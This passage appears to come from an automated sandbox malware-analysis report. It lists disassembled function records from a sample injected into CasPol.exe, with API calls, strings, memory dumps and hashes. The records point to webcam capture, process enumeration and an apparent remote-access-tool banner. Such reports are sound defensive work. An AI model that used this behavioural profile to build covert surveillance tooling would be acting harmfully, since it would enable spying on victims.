                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00419F89
                                                                                                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                    • String ID: Alarm triggered
                                                                                                                    • API String ID: 614609389-2816303416
                                                                                                                    • Opcode ID: 675496d61beac401ff127cc547d74cd9544cf0f8399b274fc267c3937a2c6cfc
                                                                                                                    • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                                                                                                    • Opcode Fuzzy Hash: 675496d61beac401ff127cc547d74cd9544cf0f8399b274fc267c3937a2c6cfc
                                                                                                                    • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                                                                                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                                                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                                                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                                                                                                    Strings
                                                                                                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                    • API String ID: 3024135584-2418719853
                                                                                                                    • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                    • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                    • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                    • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 092d045fd4dfbc3abfb12b6361b7e91f54830b77947eddd119647d88fc19d888
                                                                                                                    • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                                                                                                    • Opcode Fuzzy Hash: 092d045fd4dfbc3abfb12b6361b7e91f54830b77947eddd119647d88fc19d888
                                                                                                                    • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                      • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prologSleep
                                                                                                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                    • API String ID: 3469354165-3547787478
                                                                                                                    • Opcode ID: fb21eaf9e007e4a27ce0f2571b7ce397fb8e73e4d2fbfb625e86981dda67cab2
                                                                                                                    • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                                                                                                                    • Opcode Fuzzy Hash: fb21eaf9e007e4a27ce0f2571b7ce397fb8e73e4d2fbfb625e86981dda67cab2
                                                                                                                    • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                      • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                      • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                                                                                                      • Part of subcall function 0041B197: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1B7
                                                                                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2180151492-0
                                                                                                                    • Opcode ID: b610b4cd8a040fdfbcdaff2df3ac4d80139050be5449db3207224e51527e33ec
                                                                                                                    • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                                                                                    • Opcode Fuzzy Hash: b610b4cd8a040fdfbcdaff2df3ac4d80139050be5449db3207224e51527e33ec
                                                                                                                    • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 269201875-0
                                                                                                                    • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                    • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                                                                                                    • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                    • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0044FF68
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
                                                                                                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
                                                                                                                    • __freea.LIBCMT ref: 0044FFD4
                                                                                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 313313983-0
                                                                                                                    • Opcode ID: 88201f02e49098e6f592975d0299b58774541eebf8c41212138823b53665fa5d
                                                                                                                    • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                                                                                                    • Opcode Fuzzy Hash: 88201f02e49098e6f592975d0299b58774541eebf8c41212138823b53665fa5d
                                                                                                                    • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                                                                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                                                                                                    • _free.LIBCMT ref: 0044E1B0
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 336800556-0
                                                                                                                    • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                    • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                                                                                                    • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                    • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                    • _free.LIBCMT ref: 100071B8
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 336800556-0
                                                                                                                    • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                    • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                    • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                    • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00445369,00446B52,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578), ref: 00446F58
                                                                                                                    • _free.LIBCMT ref: 00446F8D
                                                                                                                    • _free.LIBCMT ref: 00446FB4
                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00446FC1
                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00446FCA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                    • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                                                                                                    • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                    • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                    • _free.LIBCMT ref: 10005BB4
                                                                                                                    • _free.LIBCMT ref: 10005BDB
                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                    • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                    • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                    • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3D8
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2951400881-0
                                                                                                                    • Opcode ID: ce5486b1f796499b88157f01d5bcfd41214e425df4fcbc0a0cf489e7c63b94f0
                                                                                                                    • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                                                                                                    • Opcode Fuzzy Hash: ce5486b1f796499b88157f01d5bcfd41214e425df4fcbc0a0cf489e7c63b94f0
                                                                                                                    • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                    • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                    • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                    • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                    • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 493641738-0
                                                                                                                    • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                    • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                    • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                    • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 0044F7C5
                                                                                                                      • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                    • _free.LIBCMT ref: 0044F7D7
                                                                                                                    • _free.LIBCMT ref: 0044F7E9
                                                                                                                    • _free.LIBCMT ref: 0044F7FB
                                                                                                                    • _free.LIBCMT ref: 0044F80D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                    • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                                                                                    • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                    • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 100091D0
                                                                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                    • _free.LIBCMT ref: 100091E2
                                                                                                                    • _free.LIBCMT ref: 100091F4
                                                                                                                    • _free.LIBCMT ref: 10009206
                                                                                                                    • _free.LIBCMT ref: 10009218
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                    • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                    • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                    • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00443315
                                                                                                                      • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                    • _free.LIBCMT ref: 00443327
                                                                                                                    • _free.LIBCMT ref: 0044333A
                                                                                                                    • _free.LIBCMT ref: 0044334B
                                                                                                                    • _free.LIBCMT ref: 0044335C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                    • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                                                                                                    • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                    • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 1000536F
                                                                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                    • _free.LIBCMT ref: 10005381
                                                                                                                    • _free.LIBCMT ref: 10005394
                                                                                                                    • _free.LIBCMT ref: 100053A5
                                                                                                                    • _free.LIBCMT ref: 100053B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
